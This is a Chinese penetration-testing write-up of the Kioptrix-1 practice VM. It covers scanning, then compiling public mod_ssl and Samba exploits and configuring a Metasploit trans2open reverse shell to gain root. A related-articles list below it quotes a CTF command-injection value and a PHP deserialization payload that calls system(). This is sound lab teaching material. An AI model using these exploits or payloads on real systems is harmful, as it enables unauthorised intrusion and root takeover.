skyler实战渗透笔记—Kioptrix-1

devtools/2024/12/23 18:52:43/

0x00 前言

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

 困难:easy

0x01 信息收集

这次的机器有点问题,下载下来以后,NAT下无法扫描到靶机。

后来检索到方法:

需要编辑VMX configuration file文件,把里头的bridged换成nat,但保留最后一个bridged

 

 保存重启就好。

猜测应该是虚拟机默认网络配置的问题,由于对操作系统比较熟悉,这边提供下我的思路:

1、可以通过grub进入单用户模式,然后重置密码,再查看网卡配置

2、但是发现系统本身默认设置grub时间为0,导致根本进不了单用户

3、所以考虑挂载redhat镜像,并在修复模式下挂载靶机本地硬盘,修改grub配置,再尝试单用户模式修改密码进入。

OK,老规矩,找一下目标机器

端口扫一下:

 得到开放的端口:22,80,111,139,443,1024,并得到在对应端口下使用的软件(mod_ssl/samba)。

通过端口扫描得知 apache-1.3.20,openssl-0.9.6b,mod_ssl-2.8.4(老版,谷歌搜索漏洞)
对于端口使用的插件,在下面将专门对其进行漏洞挖掘


03 目录扫描
dirb http://10.10.16.152
对 dirb 爬行的目录进行访问,没有发现可利用的价值。


04 漏洞挖掘
nikto -h 10.10.16.152

 使用 nikto 进行 web 扫描发现几处可利用漏洞。

可以使用在线漏洞数据库搜索相对应的版本漏洞

https://www.exploit-db.com/search

05 漏洞利用
0x01 mod_ssl ( remote buffer overflow )
使用 Kali 自带的漏洞查找工具查找本地所有漏洞和 shellcode

searchsploit mod_ssl

 ps: 如果使用 764.c 脚本的话,应为该脚本版本太老,所以还需对其内容进行修改,有点麻烦,这里直接使用 47080.c 脚本。

764.c 修改

在桌面新建一个 Kioptrix 文件夹,将 47080.c 文件拷贝过去,查看文件头得知文件的使用方法:要先安装 libssl-dev 库才能编译文件。

cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
head 47080.c
sudo apt-get install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto
编译之后运行生成的二进制文件,发现使用该二进制文件的方法。

由于该靶机使用 apache-1.3.20,所以将 target 定位到 0x6a - 0x6b

 0x02 samba 2.2

① remote code excution
利用 msf 的 auxiliary/scanner/smb/smb_version 模块得知靶机使用 samba-2.2.1a

搜索 samba 2.2 的漏洞利用模块,发现最下方的 Remote Code Excution

将该模块下的脚本复制到自定义的文件夹里面,查看文件头,编译脚本。

cp /usr/share/exploitdb/exploits/multiple/remote/10.c .
head 10.c
gcc -o samba 10.c

./samba -b 0 10.10.16.152 # -b 0 是指 Linux

 ② Remote Buffer Overflow


gcc -o call_trans2open 22469.c
 


./call_trans2open -t 10.10.16.152
 


③ 利用 msf
从上面 searchsploit 的结果来看,还有几个模块是关于 metasploit 的,因此可以利用 msf 来getshell 提权。

msfconsole
use exploit/linux/samba/trans2open

使用 show options 查看要添加什么参数

使用该模块下的一个 payload

set payload linux/x86/shell_reverse_tcp

set rhosts 10.10.16.152
set lhost 10.10.16.128
exploit
 

ps: 使用 python -v 查看当前 python 版本是 python 1.5 ,所以不能使用 python -c ‘import pty;pty.spawn("/bin/bash");’ ,可以使用 passwd 可以改变 root 密码,然后通过 ssh 登录 root 账户获取完全交互式 shell。


0x03 capture the flag
cat /var/mail/root

0x03 思路总结

这次的题目比较简单,目录扫描后发现没什么可用内容,就直接扫一下漏洞,找基本信息,看看有哪一些可利用的漏洞就可以。


http://www.ppmy.cn/devtools/144766.html

相关文章

robots协议

robots协议,也称为爬虫协议、爬虫规则、机器人协议等,其全称是“网络爬虫排除标准”(Robots Exclusion Protocol)。以下是对robots协议的详细介绍: 一、定义与功能 robots协议是指网站可以建立一个名为robots.txt的文…

Django-视图

这里的视图的文件是view.py的文件: django 项目中视图就相当于 python 函数或者类;django 接收到浏览器发送的请求之后,进行 URL 匹配,找到对应的视图进行响应。 视图中第一个参数必须是 HttpRequest 的对象(正常情况下,默认写为 request) 视图中必须返回一个 HttpResp…

AMS1117芯片驱动电路·降压芯片的驱动电路详解

目录 AMS1117常见封装 AMS1117不同系列 AMS1117驱动电路 参考数据手册 编写不易,仅供学习,请勿搬运,感谢理解 相同LDO芯片驱动专栏文章 LM7805系列降压芯片驱动电路降压芯片驱动电路详解-CSDN博客 ME6211C系列降压芯片驱动电路降压芯片…

【VSCode】常用插件汇总

1 Path Autocomplete(路径提示的插件) 步骤一:在vscode的扩展搜索中直接搜索Path Autocomplete,直接安装 步骤二:配置 配置 VS Code settings.json "path-autocomplete.pathMappings": {"": &q…

【前端爬虫】关于如何获取自己的请求头信息(user-agent和cookie)

注意:由于user-agent和cookie中保存了部分账户信息,所以一定不要随意泄露给他人!!! 1.首先打开某个页面,点击键盘的F12键进入控制台,或者鼠标右键页面选择打开控制台 2.然后点击控制台上方的网…

如何在 Debian 12 上安装和使用 Vuls 漏洞扫描器

简介 Vuls 是一款无代理、免费且开源的 Linux 和 FreeBSD 漏洞扫描器。Vuls 主要用 Go 语言编写,可以在任何地方运行。你可以在云端、本地和 Docker 上运行 Vuls,并且它支持主要的发行版。Vuls 提供高质量的扫描,支持多个漏洞数据库&#xf…

搭建MPI/CUDA开发环境

本文记录MPI/CUDA开发环境搭建过程。 一、Linux 2.1 环境 操作系统Ubuntu 22.04.4 LTSVS Code1.92.1Git2.34.1GCC11.4.0CMake3.22.1 2.2 VS Code 下载VS Code,然后安装以下插件, Task Explorer Output Colorizer Git Extension Pack Git Graph Remot…

【Web】PolarCTF2024秋季个人挑战赛wp

EZ_Host 一眼丁真命令注入 payload: ?host127.0.0.1;catf*序列一下 exp: <?phpclass Polar{public $lt;public $b; } $pnew Polar(); $p->lt"system"; $p->b"tac /f*"; echo serialize($p);payload: xO:5:"Polar":2:{s:2:"l…